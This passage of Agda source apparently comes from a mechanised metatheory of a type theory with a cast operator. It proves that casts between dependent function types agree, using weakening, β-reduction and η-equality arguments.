F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₂ ∘ a ^ ⁰ ∷ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [a]) ([f₁≡f₂] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ f₁ ∘ a ^ ⁰ ≡ wk ρ f₂ ∘ a ^ ⁰ ∷ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [a]) (recursor₁ : ∀ {ρ Δ x y t e} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x]) (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) e t ∷ wk (lift ρ) G₃ [ y ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [y]) (recursor₂ : ∀ {ρ Δ x y t e} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₂ [ x ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x]) (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) e t ∷ wk (lift ρ) G₄ [ y ] ^ [ ! , ι ⁰ ] / [G₄] [ρ] ⊢Δ [y]) (extrecursor₁ : ∀ {ρ Δ x x′ y y′ t t′ e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x′] : Δ ⊩⟨ ι ⁰ ⟩ x′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x≡x′] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ x′ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([y′] : Δ ⊩⟨ ι ⁰ ⟩ y′ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([y≡y′] : Δ ⊩⟨ ι ⁰ ⟩ y ≡ y′ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x]) → ([t′] : Δ ⊩⟨ ι ⁰ ⟩ t′ ∷ wk (lift ρ) G₁ [ x′ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x′]) → ([t≡t′] : Δ ⊩⟨ ι ⁰ ⟩ t ≡ t′ ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x]) → (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x′ ]) (wk (lift ρ) G₃ [ y′ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₁ [ x ]) (wk (lift ρ) G₃ [ y ]) e t ≡ cast ⁰ (wk (lift ρ) G₁ [ x′ ]) (wk (lift ρ) G₃ [ y′ ]) e′ t′ ∷ wk (lift ρ) G₃ [ y ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [y]) (extrecursor₂ : ∀ {ρ Δ x x′ y y′ t t′ e e′} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([x′] : Δ ⊩⟨ ι ⁰ ⟩ x′ ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([x≡x′] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ x′ ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([y′] : Δ ⊩⟨ ι ⁰ ⟩ y′ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([y≡y′] : Δ ⊩⟨ ι ⁰ ⟩ y ≡ y′ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([t] : Δ ⊩⟨ ι ⁰ ⟩ t ∷ wk (lift ρ) G₂ [ x ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x]) → ([t′] : Δ ⊩⟨ ι ⁰ ⟩ t′ ∷ wk (lift ρ) G₂ [ x′ ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x′]) → ([t≡t′] : Δ ⊩⟨ ι ⁰ ⟩ t ≡ t′ ∷ wk (lift ρ) G₂ [ x ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x]) → (⊢e : Δ ⊢ e ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) ^ [ % , ι ¹ ]) → (⊢e′ : Δ ⊢ e′ ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x′ ]) (wk (lift ρ) G₄ [ y′ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₂ [ x ]) (wk (lift ρ) G₄ [ y ]) e t ≡ cast ⁰ (wk (lift ρ) G₂ [ x′ ]) (wk (lift ρ) G₄ [ y′ ]) e′ t′ ∷ wk (lift ρ) G₄ [ y ] ^ [ ! , ι ⁰ ] / [G₄] [ρ] ⊢Δ [y]) (eqrecursor : ∀ {ρ Δ x₁ x₂ x₃ x₄ t₁ t₂ e₁₃ e₂₄} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x₁] : Δ ⊩⟨ ι ⁰ ⟩ x₁ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x₂] : Δ ⊩⟨ ι ⁰ ⟩ x₂ ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) → ([G₁x₁≡G₂x₂] : Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ x₁ ] ≡ wk (lift ρ) G₂ [ x₂ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x₁]) → ([x₃] : Δ ⊩⟨ ι ⁰ ⟩ x₃ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([x₄] : Δ ⊩⟨ ι ⁰ ⟩ x₄ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([G₃x₃≡G₄x₄] : Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₃ [ x₃ ] ≡ wk (lift ρ) G₄ [ x₄ ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [x₃]) → ([t₁] : Δ ⊩⟨ ι ⁰ ⟩ t₁ ∷ wk (lift ρ) G₁ [ x₁ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x₁]) → ([t₂] : Δ ⊩⟨ ι ⁰ ⟩ t₂ ∷ wk (lift ρ) G₂ [ x₂ ] ^ [ ! , ι ⁰ ] / [G₂] [ρ] ⊢Δ [x₂]) → ([t₁≡t₂] : Δ ⊩⟨ ι ⁰ ⟩ t₁ ≡ t₂ ∷ wk (lift ρ) G₁ [ x₁ ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x₁]) → (⊢e₁₃ : Δ ⊢ e₁₃ ∷ Id (U ⁰) (wk (lift ρ) G₁ [ x₁ ]) (wk (lift ρ) G₃ [ x₃ ]) ^ [ % , ι ¹ ]) → (⊢e₂₄ : Δ ⊢ e₂₄ ∷ Id (U ⁰) (wk (lift ρ) G₂ [ x₂ ]) (wk (lift ρ) G₄ [ x₄ ]) ^ [ % , ι ¹ ]) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk (lift ρ) G₁ [ x₁ ]) (wk (lift ρ) G₃ [ x₃ ]) e₁₃ t₁ ≡ cast ⁰ (wk (lift ρ) G₂ [ x₂ ]) (wk (lift ρ) G₄ [ x₄ ]) e₂₄ t₂ ∷ wk (lift ρ) G₃ [ x₃ ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [x₃]) ([b₁] : ∀ {ρ Δ e x} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e) x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([bext₁] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e) x ≡ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e′) y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) ([b₂] : ∀ {ρ Δ e x} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) (⊢e : Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e) x ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([bext₂] : ∀ {ρ Δ e e′ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e) x ≡ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e′) y ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / [F₂] [ρ] ⊢Δ) ([b₁≡b₂] : ∀ {ρ Δ e₁₃ e₂₄ x₃ x₄} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (Δ ⊢ e₁₃ ∷ Id (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) ^ [ % , ι ¹ ]) → (Δ ⊢ e₂₄ ∷ Id (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x₃ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x₄ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x₃ ≡ x₄ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₃) (wk ρ F₁) (Idsym (Univ rF ⁰) (wk ρ F₁) (wk ρ F₃) e₁₃) x₃ ≡ cast ⁰ (wk ρ F₄) (wk ρ F₂) (Idsym (Univ rF ⁰) (wk ρ F₂) (wk ρ F₄) e₂₄) x₄ ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) where module g₁ = cast-ΠΠ-lemmas-2 ⊢Γ ⊢A₁ ⊢ΠF₁G₁ D₁ ⊢F₁ ⊢G₁ A₁≡A₁ [F₁] [G₁] G₁-ext ⊢A₃ ⊢ΠF₃G₃ D₃ ⊢F₃ ⊢G₃ A₃≡A₃ [F₃] [G₃] G₃-ext ⊢e₁₃ recursor₁ extrecursor₁ ⊢t₁ Df₁ [f₁ext] [f₁] [b₁] [bext₁] module g₂ = cast-ΠΠ-lemmas-2 ⊢Γ ⊢A₂ ⊢ΠF₂G₂ D₂ ⊢F₂ ⊢G₂ A₂≡A₂ [F₂] [G₂] G₂-ext ⊢A₄ ⊢ΠF₄G₄ D₄ ⊢F₄ ⊢G₄ A₄≡A₄ [F₄] [G₄] G₄-ext ⊢e₂₄ recursor₂ extrecursor₂ ⊢t₂ Df₂ [f₂ext] [f₂] [b₂] [bext₂] [g₁≡g₂] : ∀ {ρ Δ x₃ x₄} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x₃] : Δ ⊩⟨ ι ⁰ ⟩ x₃ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → ([x₄] : Δ ⊩⟨ ι ⁰ ⟩ x₄ ∷ wk ρ F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ] ⊢Δ) → ([x₃≡x₄] : Δ ⊩⟨ ι ⁰ ⟩ x₃ ≡ x₄ ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ g₁.g ρ x₃ ≡ g₂.g ρ x₄ ∷ wk (lift ρ) G₃ [ x₃ ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [x₃] [g₁≡g₂] {ρ} {Δ} {x₃} {x₄} [ρ] ⊢Δ [x₃] [x₄] [x₃≡x₄] = let [b₁] = [b₁] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ g₁.⊢fste) [x₃] [b₂] = [b₂] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ g₂.⊢fste) [x₄] [b₁≡b₂]′ = [b₁≡b₂] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ g₁.⊢fste) (Twk.wkTerm [ρ] ⊢Δ g₂.⊢fste) [x₃] [x₄] [x₃≡x₄] [b₁:F₂] = convTerm₁ ([F₁] [ρ] ⊢Δ) ([F₂] [ρ] ⊢Δ) ([F₁≡F₂] [ρ] ⊢Δ) [b₁] [b₁≡b₂:F₂] = convEqTerm₁ ([F₁] [ρ] ⊢Δ) ([F₂] [ρ] ⊢Δ) ([F₁≡F₂] [ρ] ⊢Δ) [b₁≡b₂]′ [G₁b₁≡G₂b₂] = transEq ([G₁] [ρ] ⊢Δ [b₁]) ([G₂] [ρ] ⊢Δ [b₁:F₂]) ([G₂] [ρ] ⊢Δ [b₂]) ([G₁≡G₂] [ρ] ⊢Δ [b₁]) (G₂-ext [ρ] ⊢Δ [b₁:F₂] [b₂] [b₁≡b₂:F₂]) [x₃:F₄] = convTerm₁ ([F₃] [ρ] ⊢Δ) ([F₄] [ρ] ⊢Δ) ([F₃≡F₄] [ρ] ⊢Δ) [x₃] [x₃≡x₄:F₄] = convEqTerm₁ ([F₃] [ρ] ⊢Δ) ([F₄] [ρ] ⊢Δ) ([F₃≡F₄] [ρ] ⊢Δ) [x₃≡x₄] [G₃x₃≡G₄x₄] = transEq ([G₃] [ρ] ⊢Δ [x₃]) ([G₄] [ρ] ⊢Δ [x₃:F₄]) ([G₄] [ρ] ⊢Δ [x₄]) ([G₃≡G₄] [ρ] ⊢Δ [x₃]) (G₄-ext [ρ] ⊢Δ [x₃:F₄] [x₄] [x₃≡x₄:F₄]) [t₁] , [t₁≡f₁b₁] = redSubstTerm (appRed (escapeTerm ([F₁] [ρ] ⊢Δ) [b₁]) (Twk.wkRedTerm [ρ] ⊢Δ Df₁)) ([G₁] [ρ] ⊢Δ [b₁]) ([f₁] [ρ] ⊢Δ [b₁]) [t₂] , [t₂≡f₂b₂] = redSubstTerm (appRed* (escapeTerm ([F₂] [ρ] ⊢Δ) [b₂]) (Twk.wkRedTerm [ρ] ⊢Δ Df₂)) ([G₂] [ρ] ⊢Δ [b₂]) ([f₂] [ρ] ⊢Δ [b₂]) [t₁≡f₂b₁] = transEqTerm ([G₁] [ρ] ⊢Δ [b₁]) [t₁≡f₁b₁] ([f₁≡f₂] [ρ] ⊢Δ [b₁]) [f₂b₁≡t₂] = symEqTerm ([G₂] [ρ] ⊢Δ [b₂]) (transEqTerm ([G₂] [ρ] ⊢Δ [b₂]) [t₂≡f₂b₂] ([f₂ext] [ρ] ⊢Δ [b₂] [b₁:F₂] (symEqTerm ([F₂] [ρ] ⊢Δ) [b₁≡b₂:F₂]))) [t₁≡t₂] = transEqTerm ([G₁] [ρ] ⊢Δ [b₁]) [t₁≡f₂b₁] (convEqTerm₂ ([G₁] [ρ] ⊢Δ [b₁]) ([G₂] [ρ] ⊢Δ [b₂]) [G₁b₁≡G₂b₂] [f₂b₁≡t₂]) x = eqrecursor [ρ] ⊢Δ [b₁] [b₂] [G₁b₁≡G₂b₂] [x₃] [x₄] [G₃x₃≡G₄x₄] [t₁] [t₂] [t₁≡t₂] (g₁.⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₃] [ρ] ⊢Δ) [x₃])) (g₂.⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₄] [ρ] ⊢Δ) [x₄])) in x g₁≡g₂ : Γ ⊢ (lam F₃ ▹ g₁.g (step id) (var 0) ^ ⁰) ≅ (lam F₄ ▹ g₂.g (step id) (var 0) ^ ⁰) ∷ Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ] g₁≡g₂ = let Δ₁ = g₁.Δ₁ ⊢Δ₁ = g₁.⊢Δ₁ [ρ₁] = g₁.[ρ₁] ⊢F₃′ = Twk.wk (Twk.step Twk.id) ⊢Δ₁ ⊢F₃ ⊢g₁0 = escapeTerm ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) (g₁.[g] [ρ₁] ⊢Δ₁ g₁.[0]) ⊢g₁0′ = (PE.subst (λ X → Δ₁ ⊢ g₁.g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₃) ⊢g₁0) ⊢g₁0″ = Twk.wkTerm (Twk.lift (Twk.step Twk.id)) (⊢Δ₁ ∙ ⊢F₃′) ⊢g₁0′ ⊢F₄′ = Twk.wk (Twk.step Twk.id) ⊢Δ₁ ⊢F₄ ⊢g₂0 = escapeTerm ([G₄] g₂.[ρ₁] g₂.⊢Δ₁ g₂.[0]) (g₂.[g] g₂.[ρ₁] g₂.⊢Δ₁ g₂.[0]) ⊢g₂0′ = (PE.subst (λ X → g₂.Δ₁ ⊢ g₂.g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₄) ⊢g₂0) ⊢g₂0″ = Twk.wkTerm (Twk.lift (Twk.step Twk.id)) (⊢Δ₁ ∙ ⊢F₄′) ⊢g₂0′ D₁ : Δ₁ ⊢ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒ g₁.g (step id) (var 0) ∷ wk1d G₃ [ var 0 ] ^ ι ⁰ D₁ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒ X ∷ wk1d G₃ [ var 0 ] ^ ι ⁰) (wkSingleSubstId (g₁.g (step id) (var 0))) (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₃′ ⊢g₁0″ (var ⊢Δ₁ here)) ⇨ id ⊢g₁0 F₃≡F₄ = escapeEq ([F₃] [ρ₁] ⊢Δ₁) ([F₃≡F₄] [ρ₁] ⊢Δ₁) [0:F₄] : Δ₁ ⊩⟨ ι ⁰ ⟩ var 0 ∷ wk (step id) F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ₁] ⊢Δ₁ [0:F₄] = neuTerm ([F₄] [ρ₁] ⊢Δ₁) (var 0) (conv (var ⊢Δ₁ here) (≅-eq F₃≡F₄)) (~-var (conv (var ⊢Δ₁ here) (≅-eq F₃≡F₄))) D₂ : Δ₁ ⊢ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒* g₂.g (step id) (var 0) ∷ wk1d G₄ [ var 0 ] ^ ι ⁰ D₂ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒ X ∷ wk1d G₄ [ var 0 ] ^ ι ⁰) (wkSingleSubstId (g₂.g (step id) (var 0))) (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₄′ ⊢g₂0″ (conv (var ⊢Δ₁ here) (≅-eq F₃≡F₄))) ⇨ id (escapeTerm ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) (g₂.[g] [ρ₁] ⊢Δ₁ [0:F₄])) [g₁0≡g₁] : Δ₁ ⊩⟨ ι ⁰ ⟩ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≡ g₁.g (step id) (var 0) ∷ wk1d G₃ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₃] [ρ₁] ⊢Δ₁ g₁.[0] [g₁0≡g₁] = proj₂ (redSubstTerm D₁ ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) (g₁.[g] [ρ₁] ⊢Δ₁ g₁.[0])) [g₂0≡g₂] : Δ₁ ⊩⟨ ι ⁰ ⟩ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≡ g₂.g (step id) (var 0) ∷ wk1d G₄ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₄] [ρ₁] ⊢Δ₁ [0:F₄] [g₂0≡g₂] = proj₂ (redSubstTerm D₂ ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) (g₂.[g] [ρ₁] ⊢Δ₁ [0:F₄])) [g₁≡g₂]′ : Δ₁ ⊩⟨ ι ⁰ ⟩ g₁.g (step id) (var 0) ≡ g₂.g (step id) (var 0) ∷ wk1d G₃ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₃] [ρ₁] ⊢Δ₁ g₁.[0] [g₁≡g₂]′ = [g₁≡g₂] [ρ₁] ⊢Δ₁ g₁.[0] (convTerm₁ ([F₃] [ρ₁] ⊢Δ₁) ([F₄] [ρ₁] ⊢Δ₁) ([F₃≡F₄] [ρ₁] ⊢Δ₁) g₁.[0]) (reflEqTerm ([F₃] [ρ₁] ⊢Δ₁) g₁.[0]) [g₁0≡g₂0] = transEqTerm ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) (transEqTerm ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) [g₁0≡g₁] [g₁≡g₂]′) (convEqTerm₂ ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) ([G₃≡G₄] [ρ₁] ⊢Δ₁ g₁.[0]) (symEqTerm ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) [g₂0≡g₂])) x₀ = escapeTermEq ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) [g₁0≡g₂0] x₁ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≅ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₃) x₀ in ≅-η-eq (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₃ g₁.⊢λg (conv g₂.⊢λg (sym (≅-eq A₃≡A₄))) lamₙ lamₙ x₁ [g₁a≡g₂a] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ wk ρ (lam F₃ ▹ g₁.g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ≡ wk ρ (lam F₄ ▹ g₂.g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ∷ wk (lift ρ) G₃ [ a ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [a]) [g₁a≡g₂a] [ρ] ⊢Δ [a] = let [a]′ = convTerm₁ ([F₃] [ρ] ⊢Δ) ([F₄] [ρ] ⊢Δ) ([F₃≡F₄] [ρ] ⊢Δ) [a] [a≡a] = reflEqTerm ([F₃] [ρ] ⊢Δ) [a] in redSubst*EqTerm (g₁.g∘a≡ga [ρ] ⊢Δ [a]) (g₂.g∘a≡ga [ρ] ⊢Δ [a]′) ([G₃] [ρ] ⊢Δ [a]) ([G₄] [ρ] ⊢Δ [a]′) ([G₃≡G₄] [ρ] ⊢Δ [a]) (g₁.[g] [ρ] ⊢Δ [a]) (g₂.[g] [ρ] ⊢Δ [a]′) ([g₁≡g₂] [ρ] ⊢Δ [a] [a]′ [a≡a])
